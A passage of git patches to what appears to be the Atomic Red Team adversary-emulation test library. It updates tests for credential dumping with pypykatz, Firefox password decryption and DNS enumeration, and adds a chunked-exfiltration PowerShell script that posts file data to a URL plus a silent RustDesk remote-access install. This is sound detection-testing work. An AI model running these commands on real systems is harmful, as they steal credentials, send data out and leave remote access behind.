\"https://bootstrap.pypa.io/ez_setup.py\" - -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\" \ninvoke-webrequest - \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd - /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n" - - description: 'adidnsdump must be installed and part of PATH + get_prereq_command: 'py -m venv "#{venv_path}" + + ' + - description: 'adidnsdump must be installed ' - prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} 
else {exit 1} + prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction + SilentlyContinue) { exit 0 } else { exit 1 } ' - get_prereq_command: 'pip3 install adidnsdump + get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir + adidnsdump 2>&1 | Out-Null ' executor: - command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} + command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} + --print-zones #{host_name} ' name: command_prompt @@ -81386,7 +81421,8 @@ discovery: - description: 'Check if python exists on the machine ' - prereq_command: 'if (python --version) {exit 0} else {exit 1} + prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit + 0 } else { exit 1 } ' get_prereq_command: | 
@@ -92331,7 +92367,39 @@ exfiltration: - 'Network Traffic: Network Traffic Flow' x_mitre_is_subtechnique: false identifier: T1030 - atomic_tests: [] + atomic_tests: + - name: Network-Based Data Transfer in Small Chunks + auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f + description: Simulate transferring data over a network in small chunks to evade + detection. + supported_platforms: + - windows + input_arguments: + source_file_path: + description: Path to the source file to transfer. + type: path + default: "[User specified]" + destination_url: + description: URL of the destination server. + type: url + default: http://example.com + chunk_size: + description: Size of each data chunk (in KB). + type: integer + default: 1024 + executor: + name: powershell + elevation_required: false + command: | + $file = [System.IO.File]::OpenRead(#{source_file_path}) + $chunkSize = #{chunk_size} * 1KB + $buffer = New-Object Byte[] $chunkSize + + while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk + } + $file.Close() T1537: technique: x_mitre_platforms: diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index b184dcd6a9..c99c245666 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -363,6 +363,8 @@ Python 3 must be installed, use the get_prereq_command's to meet the prerequisit Successful execution of this test will display multiple usernames and passwords/hashes to the screen. +Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. + **Supported Platforms:** Windows 
@@ -372,53 +374,55 @@ Successful execution of this test will display multiple usernames and passwords/ +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001| + #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -pypykatz live lsa +"#{venv_path}\Scripts\pypykatz" live lsa ``` +#### Cleanup Commands: +```cmd +del "%temp%\nanodump.dmp" > nul 2> nul +``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -```cmd -py -3 --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd +```powershell New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Computer must have pip installed +##### Description: Computer must have venv configured at #{venv_path} ##### Check Prereq Commands: -```cmd -py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" 
-outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" +```powershell +py -m venv "#{venv_path}" ``` -##### Description: pypykatz must be installed and part of PATH +##### Description: pypykatz must be installed ##### Check Prereq Commands: -```cmd -pypykatz -h >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -pip install pypykatz +```powershell +& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null ``` diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 6022597472..ee918796a1 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -82,7 +82,9 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz -Parses registry hives to obtain stored credentials +Parses registry hives to obtain stored credentials. + +Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. **Supported Platforms:** Windows 
@@ -93,47 +95,51 @@ Parses registry hives to obtain stored credentials +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002| + #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -pypykatz live registry +"#{venv_path}\Scripts\pypykatz" live lsa ``` -#### Dependencies: Run with `command_prompt`! +#### Dependencies: Run with `powershell`! ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: -```cmd -py -3 --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -echo "Python 3 must be installed manually" +```powershell +New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null +invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" +Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Computer must have pip installed +##### Description: Computer must have venv configured at #{venv_path} ##### Check Prereq Commands: -```cmd -py -3 -m pip --version >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -echo "PIP must be installed manually" +```powershell +py -m venv "#{venv_path}" ``` -##### Description: pypykatz must be installed and part of PATH +##### Description: pypykatz must be installed ##### Check Prereq Commands: -```cmd -pypykatz -h >nul 2>&1 -exit /b %errorlevel% +```powershell +if (Get-Command "#{venv_path}\Scripts\pypykatz" 
-errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: -```cmd -pip install pypykatz +```powershell +& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null ``` diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index d7205e587f..5762e03e80 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -351,13 +351,14 @@ Successful execution of this test will list dns zones in the terminal. | user_name | username including domain. | string | domain\user| | acct_pass | Account password. | string | password| | host_name | hostname or ip address to connect to. | string | 192.168.1.1| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1018| #### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd -adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} +"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name} ``` @@ -367,7 +368,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} ##### Description: Computer must have python 3 installed ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell 
@@ -375,27 +376,23 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Computer must have pip installed +##### Description: Computer must have venv configured at #{venv_path} ##### Check Prereq Commands: ```powershell -if (pip3 -V) {exit 0} else {exit 1} +if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" +py -m venv "#{venv_path}" ``` -##### Description: adidnsdump must be installed and part of PATH +##### Description: adidnsdump must be installed ##### Check Prereq Commands: ```powershell -if (cmd /c adidnsdump -h) {exit 0} else {exit 1} +if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell -pip3 install adidnsdump +& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null ``` diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 70806f0713..17d8d1b812 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md 
@@ -6,6 +6,8 @@ - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits) +- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks) +
@@ -57,4 +59,47 @@ if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/s +
+
+ +## Atomic Test #2 - Network-Based Data Transfer in Small Chunks +Simulate transferring data over a network in small chunks to evade detection. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| source_file_path | Path to the source file to transfer. | path | [User specified]| +| destination_url | URL of the destination server. | url | http://example.com| +| chunk_size | Size of each data chunk (in KB). | integer | 1024| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$file = [System.IO.File]::OpenRead(#{source_file_path}) +$chunkSize = #{chunk_size} * 1KB +$buffer = New-Object Byte[] $chunkSize + +while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) { + $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead) + Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk +} +$file.Close() +``` + + + + + +
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 2cb24d7c5a..9819385329 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -215,7 +215,7 @@ python "#{filename}" -i #{host_ip} ##### Description: Check if python exists on the machine ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md index 49ab1de237..b3782da689 100644 --- a/atomics/T1059.006/T1059.006.md +++ b/atomics/T1059.006/T1059.006.md @@ -48,7 +48,8 @@ $which_python -c 'import requests;import os;url = "#{script_url}";malicious_comm #### Cleanup Commands: ```sh -rm #{payload_file_name} +rm #{payload_file_name} +pip-autoremove pypykatz >nul 2> nul ``` diff --git a/atomics/T1555.003/T1555.003.md b/atomics/T1555.003/T1555.003.md index aad2b306ba..7acddb9e38 100644 --- a/atomics/T1555.003/T1555.003.md +++ b/atomics/T1555.003/T1555.003.md @@ -420,7 +420,9 @@ Stop-Process -Name msedge ## Atomic Test #8 - Decrypt Mozilla Passwords with Firepwd.py Firepwd.py is a script that can decrypt Mozilla (Thunderbird, Firefox) passwords. -Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. +Upon successful execution, the decrypted credentials will be output to a text file, as well as displayed on screen. + +Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution. **Supported Platforms:** Windows 
@@ -434,10 +436,11 @@ Upon successful execution, the decrypted credentials will be output to a text fi #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py| +| Firepwd_Path | Filepath for Firepwd.py | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py| | Out_Filepath | Filepath to output results to | string | $env:temp\T1555.003Test8.txt| | VS_CMD_Path | Filepath to Visual Studio Build Tools Command prompt | string | C:\Program Files (x86)\Microsoft Visual Studio\2022\BuildTools\VC\Auxiliary\Build\vcvars64.bat| | Python_Path | Filepath to python | string | C:\Program Files\Python310\python.exe| +| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004| #### Attack Commands: Run with `powershell`! @@ -445,7 +448,7 @@ Upon successful execution, the decrypted credentials will be output to a text fi ```powershell $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\" -cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} +cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath} cat #{Out_Filepath} ``` 
@@ -457,16 +460,6 @@ Remove-Item -Path "#{Out_Filepath}" -erroraction silentlycontinue #### Dependencies: Run with `powershell`! -##### Description: Firepwd must exist at #{Firepwd_Path} -##### Check Prereq Commands: -```powershell -if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} -``` -##### Get Prereq Commands: -```powershell -New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" -``` ##### Description: Firefox profile directory must be present ##### Check Prereq Commands: ```powershell 
@@ -504,41 +497,42 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait ``` -##### Description: Pip must be installed. +##### Description: Computer must have venv configured at #{venv_path} +##### Check Prereq Commands: +```powershell +if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 } +``` +##### Get Prereq Commands: +```powershell +py -m venv "#{venv_path}" +``` +##### Description: Firepwd must exist at #{Firepwd_Path} ##### Check Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (pip -v) {exit 0} else {exit 1} +if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null -invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py" -cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py" +Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}" ``` ##### Description: Pycryptodome library must be installed ##### Check Prereq Commands: ```powershell -$env:Path = 
[System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (pip show pycryptodome) {exit 0} else {exit 1} +if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} +if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"} ``` ##### Description: Pyasn1 library must be installed ##### Check Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (pip show pyasn1) {exit 0} else {exit 1} +if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell -$env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User")) -if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} +if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe install pyasn1 | 
out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."} ``` From 29e3c6eb8fcf4893f430d39f40528945dc3b0123 Mon Sep 17 00:00:00 2001 From: swathinator <161095074+swathinator@users.noreply.github.com> Date: Mon, 26 Feb 2024 14:50:20 -0500 Subject: [PATCH 39/41] Update RustDesk T1219.yaml (#2706) * Update RustDesk T1219.yaml Update RustDesk T1219 * Update T1219.yaml * Update T1219.yaml --------- Co-authored-by: Carrie Roberts --- atomics/T1219/T1219.yaml | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index e6c15d22c0..20bb1c4ec4 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -265,3 +265,18 @@ atomic_tests: Stop-Process -Name "Connect" -force -erroraction silentlycontinue name: powershell elevation_required: true +- name: RustDesk Files Detected Test on Windows + description: | + An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. + Download of RustDesk installer will be at the destination location when successfully executed. + supported_platforms: + - windows + executor: + command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe + Start-Process -FilePath $file "/S" + cleanup_command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Remove-Item $file1 -ErrorAction Ignore + name: powershell From 344dea9fbdbc5fb4fdb7844efb11901ac3edc65c Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 26 Feb 2024 19:51:04 +0000 Subject: [PATCH 40/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1219/T1219.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) 
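Review bot: The `cleanup_command` of the new RustDesk test in atomics/T1219/T1219.yaml removes `$file1`, a variable that is never assigned, so with `-ErrorAction Ignore` the cleanup silently does nothing and the downloaded installer stays on the Desktop; the line should read `Remove-Item $file -ErrorAction Ignore`. The command also starts the installer with `"/S"`, which looks like a silent install, while the description mentions only the download and the cleanup neither stops nor uninstalls RustDesk, so a remote-access tool may remain on the test host after the atomic finishes. I would state the install in the description and add an uninstall step to the cleanup. The installer is fetched from a version-pinned URL without an integrity check; comparing `(Get-FileHash $file -Algorithm SHA256).Hash` against a pinned value before `Start-Process` would keep the test from running an unexpected binary.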
diff --git a/atomics/T1219/T1219.yaml b/atomics/T1219/T1219.yaml index 20bb1c4ec4..6fdad83750 100644 --- a/atomics/T1219/T1219.yaml +++ b/atomics/T1219/T1219.yaml @@ -266,6 +266,7 @@ atomic_tests: name: powershell elevation_required: true - name: RustDesk Files Detected Test on Windows + auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e description: | An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. Download of RustDesk installer will be at the destination location when successfully executed. diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 63fdad212e..715ec315a3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1570,3 +1570,4 @@ bac8a340-be64-4491-a0cc-0985cb227f5a fef0ace1-3550-4bf1-a075-9fea55a778dd 8ce53049-5314-4279-b635-b69c5bed3a36 f0287b58-f4bc-40f6-87eb-692e126e7f8f +f1641ba9-919a-4323-b74f-33372333bf0e From ef76a8b32cf20246fec8846dbae59c7d9afb0532 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 26 Feb 2024 19:51:20 +0000 Subject: [PATCH 41/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 16 ++++++++ atomics/Indexes/windows-index.yaml | 16 ++++++++ atomics/T1219/T1219.md | 38 +++++++++++++++++++ 9 files changed, 76 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 44f72725b3..85da05fc74 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump 
volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path 
(PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- 